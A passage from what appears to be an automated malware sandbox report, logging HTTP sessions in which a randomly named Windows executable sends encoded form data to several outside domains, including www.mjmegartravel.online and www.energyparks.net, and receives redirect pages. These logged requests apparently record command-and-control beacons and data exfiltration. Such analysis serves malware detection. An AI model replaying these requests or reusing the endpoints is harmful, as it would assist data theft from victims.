                                                                                            Data Ascii: pZxtux=w6g+XejoB1YyBouVcbW382girOvj70vQExaDgR+eFQW8FneOqjWKq2ZvUloybLmV2x0MX5AASdX0YrahZ0otRf8zGjN7r5P9z9vLrAL002W403TWNDIJmRbMZ/VD1h8Ys87h65NTFfjpx630dvnCB1blwFcZy9zo4ZFS2V1t+McM+R5G5gtc2CKSZPlfDggd5g6LUn8=


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.55000576.223.67.189803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:12.700344086 CEST720OUTPOST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 4a 65 56 65 34 2b 33 37 57 67 68 6e 75 76 6a 74 45 76 63 45 78 57 44 67 55 4f 30 46 6c 47 38 46 48 75 4f 72 6d 36 4b 70 32 5a 76 4e 56 6f 33 56 72 6e 5a 32 78 4a 76 58 38 34 41 53 64 7a 30 59 72 4b 68 5a 44 38 69 53 76 38 4c 48 54 4e 35 6b 5a 50 39 7a 39 76 4c 72 44 33 53 30 32 4f 34 31 47 44 57 4e 69 49 49 34 68 62 50 61 2f 56 44 78 68 38 63 73 38 37 44 36 38 74 70 46 5a 6e 70 78 34 76 30 64 2b 6e 42 61 6c 61 75 30 46 64 76 39 76 79 41 77 59 5a 48 71 30 77 79 6d 4e 49 72 32 48 49 73 6a 43 6c 30 6c 69 6d 71 4a 63 74 6f 53 51 42 30 6a 44 71 37 4b 77 71 4d 79 6b 49 4d 56 52 72 2f 50 6c 45 52 30 39 49 54 7a 42 75 30
                                                                                            Data Ascii: pZxtux=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlG8FHuOrm6Kp2ZvNVo3VrnZ2xJvX84ASdz0YrKhZD8iSv8LHTN5kZP9z9vLrD3S02O41GDWNiII4hbPa/VDxh8cs87D68tpFZnpx4v0d+nBalau0Fdv9vyAwYZHq0wymNIr2HIsjCl0limqJctoSQB0jDq7KwqMykIMVRr/PlER09ITzBu0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.55000676.223.67.189803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:15.250274897 CEST1737OUTPOST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 4a 65 56 65 34 2b 33 37 57 67 68 6e 75 76 6a 74 45 76 63 45 78 57 44 67 55 4f 30 46 6c 4f 38 46 32 4f 4f 72 46 43 4b 6d 57 5a 76 46 31 6f 32 56 72 6d 44 32 78 51 6d 58 38 38 32 53 62 33 30 59 4a 79 68 51 57 41 69 46 2f 38 4c 4d 7a 4e 36 72 35 4f 39 7a 39 2f 50 72 41 66 53 30 32 4f 34 31 46 72 57 45 54 49 49 36 68 62 4d 5a 2f 56 50 31 68 38 67 73 38 79 68 36 38 59 55 46 70 48 70 78 59 2f 30 61 4d 50 42 57 6c 61 73 35 6c 64 6e 39 76 2b 66 77 59 46 4c 71 30 55 55 6d 4c 34 72 6e 44 42 78 32 79 34 33 6d 68 65 50 45 4f 56 71 51 58 5a 6f 73 6a 4f 58 49 51 71 51 2f 57 59 62 65 55 72 73 4e 56 78 44 70 49 49 65 39 6e 44 34 71 66 4e 52 66 78 4e 37 59 64 49 76 36 44 4e 32 74 44 31 4b 4e 62 63 71 7a 48 46 44 57 4e 36 51 6b 41 47 6c 74 72 45 71 78 6a 77 6e 4f 6c 71 4f 51 4e 4a 61 4d 63 68 4f 37 4b 37 48 69 66 47 56 55 53 38 62 50 63 31 77 71 7a 30 32 73 4b 30 4e 30 6f 50 33 53 52 50 4c 49 6d 32 65 62 43 68 45 39 7a 4f 6d 6e 4f 38 30 65 42 4d 30 2b 71 2b [TRUNCATED]
                                                                                            Data Ascii: pZxtux=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlO8F2OOrFCKmWZvF1o2VrmD2xQmX882Sb30YJyhQWAiF/8LMzN6r5O9z9/PrAfS02O41FrWETII6hbMZ/VP1h8gs8yh68YUFpHpxY/0aMPBWlas5ldn9v+fwYFLq0UUmL4rnDBx2y43mhePEOVqQXZosjOXIQqQ/WYbeUrsNVxDpIIe9nD4qfNRfxN7YdIv6DN2tD1KNbcqzHFDWN6QkAGltrEqxjwnOlqOQNJaMchO7K7HifGVUS8bPc1wqz02sK0N0oP3SRPLIm2ebChE9zOmnO80eBM0+q+7TBsNi/ocdU3by5NSnZNW+7VQLo9ikwxFY1g7Ao49zwvUdym4ptETrAN7XAJOoS2SQ7SyuG4bG1y7tS8/LhUAL5qBo6Cd5liMp2zNwJyKFezWT5LRSFXLkaZZ0LatI+eWmJQ42kkxMFGe6+ATq965rTAxsjjU1QUbzWoPkcL7PxR3LZS8na8g6qJv3kRx4ruC5M9a4AQQaZ9dpEnZoDaQ5yC8BEgCvEe8iukId57O4EFow1+Ie6qCF5wrxo7xAGqZjk+13rvfHQWXmIeSnvPVZjVY/sbZ2KFO2ZOJxERqeItTSZ7ttQc5njnhRu4z76H/Rva1QsmJCW3B+OxWMFuDbwuPmOJY3tnEObVHPwMSBd+z6NjIY7wUb7Ro0ZgKl52dUpJN3tcao4bGEY8T+rEpE28kLGToLQIAjC179S9Aph8u2CSgujQrxJrwXA2gcz2B1tAP2QCF0bIs8uENObnQPeIBbHSyqtmt933FhY8zF8sSF0Cu0CvALSRDUAoU2I3RIOPDjX1KFD2dA/kK3zLxxFhx0oCJ142Z3fNc4FsE6qvHhCA3YdazN7wwHJ/DKZhaLsRI/yk+39q3iFHCQ2CwNMcSowWLsBvtT3zs1z5jze5/2jMkkinaw5CZzARqWpdum+j4toGjW0soEy2awaccm+U0Of8HN3ixQ [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.55000776.223.67.189803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:17.829683065 CEST421OUTGET /t2sm/?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:18.448698997 CEST403INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:31:18 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 5a 78 74 75 78 3d 39 34 49 65 55 71 50 4c 58 33 5a 5a 42 70 4f 42 57 4a 6a 6a 36 77 30 35 6a 70 54 78 2f 78 48 43 4b 33 62 58 75 6a 47 33 43 51 54 6c 5a 55 75 48 76 57 53 64 79 77 42 4e 44 77 30 55 4e 37 4c 41 39 53 46 75 4e 63 6f 4a 51 66 37 39 5a 6f 6d 43 66 48 6b 51 42 50 4a 66 64 54 45 55 6e 4b 53 77 77 4e 6a 62 69 69 65 4f 73 47 4f 6e 38 6b 48 6e 49 7a 31 52 67 79 54 61 56 50 4e 77 77 79 31 52 6f 77 3d 3d 26 43 36 3d 45 58 6b 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTb"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.5500083.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:23.502937078 CEST685OUTPOST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 42 36 64 30 58 7a 51 79 55 42 71 33 52 37 56 50 42 7a 2b 31 55 32 2b 50 51 2b 31 76 78 53 54 2f 67 67 62 39 49 2f 49 2f 59 46 76 6b 51 33 70 6f 2b 75 48 6d 62 48 6a 37 4c 30 37 6c 67 36 73 4c 2f 6c 63 47 59 2b 49 53 6a 39 64 47 4b 56 71 4e 71 69 32 68 68 7a 6c 55 32 42 44 65 4c 31 30 45 51 2b 41 54 59 41 61 34 46 42 46 78 52 63 6f 2f 4e 38 65 2b 71 47 41 55 56 30 6c 6a 75 2f 56 66 33 4e 5a 45 56 4d 74 79 4c 2b 71 4c 2f 6a 31 69 68 62 72 67 6f 67 57 65 76 78 6f 2f 71 38 30 59 77 56 61 56 78 72 72 5a 30 6c 76 51 2b 75 47 35 7a 33 36 32 5a 57 36 31 33 46 43 75 58 58 6d 47 61 64 36 77 44 38 38 3d
                                                                                            Data Ascii: pZxtux=B6d0XzQyUBq3R7VPBz+1U2+PQ+1vxST/ggb9I/I/YFvkQ3po+uHmbHj7L07lg6sL/lcGY+ISj9dGKVqNqi2hhzlU2BDeL10EQ+ATYAa4FBFxRco/N8e+qGAUV0lju/Vf3NZEVMtyL+qL/j1ihbrgogWevxo/q80YwVaVxrrZ0lvQ+uG5z362ZW613FCuXXmGad6wD88=


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.5500093.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:26.051460028 CEST705OUTPOST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 42 36 64 30 58 7a 51 79 55 42 71 33 51 62 6c 50 44 51 57 31 64 32 2b 4f 63 65 31 76 6f 43 54 37 67 67 58 39 49 2b 4d 56 59 33 4c 6b 51 58 5a 6f 2f 72 72 6d 53 58 6a 37 45 55 37 67 75 61 74 48 2f 6c 5a 37 59 37 49 53 6a 38 35 47 4b 55 61 4e 71 52 65 69 37 44 6c 57 37 68 44 63 46 56 30 45 51 2b 41 54 59 41 66 76 46 42 4e 78 52 4a 34 2f 4e 5a 79 35 30 57 41 56 53 30 6c 6a 71 2f 56 44 33 4e 5a 32 56 4f 49 64 4c 38 69 4c 2f 6e 6c 69 68 4f 66 76 6e 67 57 59 68 52 70 58 76 39 70 69 2f 55 76 56 36 71 2b 71 30 6b 72 44 79 34 33 54 70 56 79 65 4b 32 57 4e 6e 57 4b 5a 47 6e 48 76 41 2b 71 41 64 72 6f 57 47 41 4e 49 42 48 6a 31 4f 69 4f 2b 4c 79 56 41 72 66 75 47
                                                                                            Data Ascii: pZxtux=B6d0XzQyUBq3QblPDQW1d2+Oce1voCT7ggX9I+MVY3LkQXZo/rrmSXj7EU7guatH/lZ7Y7ISj85GKUaNqRei7DlW7hDcFV0EQ+ATYAfvFBNxRJ4/NZy50WAVS0ljq/VD3NZ2VOIdL8iL/nlihOfvngWYhRpXv9pi/UvV6q+q0krDy43TpVyeK2WNnWKZGnHvA+qAdroWGANIBHj1OiO+LyVArfuG


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.5500103.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:28.599558115 CEST1722OUTPOST /24sh/ HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.energyparks.net
                                                                                            Referer: http://www.energyparks.net/24sh/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 42 36 64 30 58 7a 51 79 55 42 71 33 51 62 6c 50 44 51 57 31 64 32 2b 4f 63 65 31 76 6f 43 54 37 67 67 58 39 49 2b 4d 56 59 33 44 6b 51 6d 35 6f 35 4d 2f 6d 41 48 6a 37 4a 30 37 68 75 61 74 4b 2f 68 4e 2f 59 37 30 6b 6a 2b 78 47 59 6d 53 4e 73 67 65 69 31 7a 6c 57 79 42 44 66 4c 31 30 56 51 2b 51 58 59 41 50 76 46 42 4e 78 52 4f 41 2f 5a 63 65 35 32 57 41 55 56 30 6b 33 75 2f 56 2f 33 4e 42 63 56 4f 64 69 4c 4d 43 4c 2b 48 31 69 6a 38 48 76 71 67 57 61 69 52 70 50 76 39 6c 48 2f 55 43 73 36 72 36 41 30 6a 6e 44 32 64 43 74 36 58 4f 31 53 58 4b 6f 6b 6b 71 59 52 58 66 50 50 66 2b 58 52 74 73 59 4d 77 67 69 42 51 6e 7a 62 41 79 7a 5a 44 42 53 6e 71 72 53 61 55 59 45 51 36 46 44 30 5a 61 4f 63 79 6f 64 4d 4f 76 49 38 78 47 4b 31 53 69 61 71 41 39 73 48 48 39 71 4f 78 37 56 59 77 72 68 38 71 59 48 41 67 62 61 4c 32 6b 46 77 71 5a 4c 46 53 39 39 47 70 65 2b 57 4b 74 74 44 75 77 62 6f 73 73 59 4c 52 38 70 63 6b 38 31 32 47 53 61 6d 32 72 57 41 64 68 4e 37 6d 4c 30 6e 2b 51 32 6f 6a 59 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=B6d0XzQyUBq3QblPDQW1d2+Oce1voCT7ggX9I+MVY3DkQm5o5M/mAHj7J07huatK/hN/Y70kj+xGYmSNsgei1zlWyBDfL10VQ+QXYAPvFBNxROA/Zce52WAUV0k3u/V/3NBcVOdiLMCL+H1ij8HvqgWaiRpPv9lH/UCs6r6A0jnD2dCt6XO1SXKokkqYRXfPPf+XRtsYMwgiBQnzbAyzZDBSnqrSaUYEQ6FD0ZaOcyodMOvI8xGK1SiaqA9sHH9qOx7VYwrh8qYHAgbaL2kFwqZLFS99Gpe+WKttDuwbossYLR8pck812GSam2rWAdhN7mL0n+Q2ojYkD43gJcLtR4kEThTTs3hxD3njYWumNcLtOKtRLCc1DBoXLhFi2mGcDqe2mD1H5i8rsX5V9nfIIbJukirxLCoACih8/hAVAG6xLxIUBmWTEKcnzByuHdpq3pL9i3QiVUGi8M6wMLuJmDidSoqYIlHfzzYKPmJkZNa/wv6tzEevtRp+gRggbedX8CQcaANwXrnhLtBUQNKheRgbBbnHgZnRu03D2NUppRxM7vUMOaJDd5d+P4EFzPO08k9OKZLshCluZDqOGXnwh43zcolvKgnulj4mmq4sHxnQZaVZxe4lPXA0Tzj9DbJ+vL4xvRsLQ3+oSj8mCA/JqougRzucXjDdD+nxPrSTw7KM5gw3CvKnPhOkucP1GHJXGIxMlLlRZWwdtTVFKl0KGMynM83jYg2qJRtGNZlVDXHin5Z0bNAjh4YD2O0i1oCumu8rge1k1PTvyFqRXPpOMEl/fNk9Q30sUf965/Q1p+n+JZx4cFx1GGZCJ3aI48UDW+NrEdY43Z2eIyv27QMziCztQVAbUdoDmB+EkX5dYYQfY4+xdVtlf5STQubnjQHraru9TlvmYgJVp1XN6z+Ha3cXk8uhgSTg7OqDZYFvEGiymcAdh6aE/jJBpPM1pp4ZSZEqOnFEyc1lZ9X5IWkO+bZ+GnXcQe3ME/jfMXQJgvpad [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.5500113.33.130.190803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:31.165919065 CEST416OUTGET /24sh/?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.energyparks.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:31.774564028 CEST403INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:31:31 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 5a 78 74 75 78 3d 4d 34 31 55 55 47 77 52 50 54 44 63 59 59 70 37 4e 6a 7a 46 63 68 58 71 54 75 39 6f 68 43 47 32 68 6e 58 39 51 4f 59 54 57 48 76 75 43 30 56 31 33 75 76 6c 42 57 2f 38 4d 55 72 58 7a 61 77 51 79 51 41 45 61 65 73 6c 72 74 4a 64 41 55 58 55 68 6a 43 52 78 56 68 57 72 54 75 32 48 6d 31 35 59 2b 45 48 4c 53 36 39 41 6a 31 31 47 38 49 68 4b 75 4b 44 73 30 4a 48 52 6c 67 30 72 72 38 79 68 41 3d 3d 26 43 36 3d 45 58 6b 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTb"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.550012172.67.177.220803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:36.828985929 CEST691OUTPOST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 50 37 34 50 79 58 45 4a 79 4c 67 79 31 6b 75 64 54 48 42 69 6d 4e 6b 41 41 66 79 31 4e 6a 48 33 56 4c 76 47 54 32 77 6d 68 43 69 51 58 39 56 42 35 43 35 61 68 46 4e 73 52 53 69 55 37 48 65 6a 39 38 61 76 4d 52 4d 55 72 42 62 65 4c 6b 78 6c 46 57 78 6b 51 53 5a 71 4a 31 6b 6b 4e 4b 62 74 45 47 55 50 69 6f 2b 56 78 68 50 44 43 61 44 4b 33 53 6a 63 4a 4f 56 6a 74 70 33 61 70 78 6e 51 6a 33 46 32 42 4c 63 73 49 46 66 30 58 41 72 4f 41 49 6b 76 6d 68 69 58 31 34 69 45 53 69 52 2f 33 39 6f 67 54 70 75 37 57 50 69 63 35 63 6b 4e 43 32 51 77 64 5a 46 52 43 54 55 3d
                                                                                            Data Ascii: pZxtux=vRuw1vbntSzeP74PyXEJyLgy1kudTHBimNkAAfy1NjH3VLvGT2wmhCiQX9VB5C5ahFNsRSiU7Hej98avMRMUrBbeLkxlFWxkQSZqJ1kkNKbtEGUPio+VxhPDCaDK3SjcJOVjtp3apxnQj3F2BLcsIFf0XArOAIkvmhiX14iESiR/39ogTpu7WPic5ckNC2QwdZFRCTU=
                                                                                            Oct 24, 2024 15:31:37.554816008 CEST879INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCHOoxPsJaPWs9EBkOG%2F0B%2FjJzSPfqRpowV44KZX77grvGMuWFrh%2BGp%2FPjmcD4VLxKermaFoMY2CCeff3gWmRdsKnObkJmeUTau1qK%2FTHvMBN68wNO5lw3IVzhihiIOtlfCtlYuFbeA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a54067a6345fb-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=691&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 190


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.550013172.67.177.220803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:39.374583960 CEST711OUTPOST /df5c/ HTTP/1.1
                                                                                            Host: www.theawareness.shop
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.theawareness.shop
                                                                                            Referer: http://www.theawareness.shop/df5c/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 76 52 75 77 31 76 62 6e 74 53 7a 65 4a 6f 67 50 30 77 51 4a 36 4c 67 7a 70 55 75 64 59 6e 42 6d 6d 4e 6f 41 41 62 4b 6c 4e 77 6a 33 56 75 54 47 53 33 77 6d 76 69 69 51 5a 64 56 45 30 69 35 52 68 46 41 47 52 54 75 55 37 48 4b 6a 39 2b 53 76 4d 6d 34 58 74 52 62 63 66 55 78 6e 4c 32 78 6b 51 53 5a 71 4a 78 45 43 4e 4d 7a 74 59 6c 63 50 69 4e 4b 61 38 42 50 41 53 71 44 4b 7a 53 69 58 4a 4f 55 4f 74 72 54 38 70 33 6a 51 6a 7a 42 32 42 66 49 7a 52 31 65 78 5a 67 71 59 45 4b 68 41 76 53 62 64 34 5a 4c 45 4e 44 78 64 79 4c 5a 4b 4a 4c 6d 54 46 76 4f 6b 70 50 73 36 54 47 78 5a 48 36 56 68 63 45 43 43 41 68 32 70 31 33 6c 58 74 53 69 66 51 59 72 53 6e 62 79 36
                                                                                            Data Ascii: pZxtux=vRuw1vbntSzeJogP0wQJ6LgzpUudYnBmmNoAAbKlNwj3VuTGS3wmviiQZdVE0i5RhFAGRTuU7HKj9+SvMm4XtRbcfUxnL2xkQSZqJxECNMztYlcPiNKa8BPASqDKzSiXJOUOtrT8p3jQjzB2BfIzR1exZgqYEKhAvSbd4ZLENDxdyLZKJLmTFvOkpPs6TGxZH6VhcECCAh2p13lXtSifQYrSnby6
                                                                                            Oct 24, 2024 15:31:40.068412066 CEST879INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            cf-cache-status: DYNAMIC
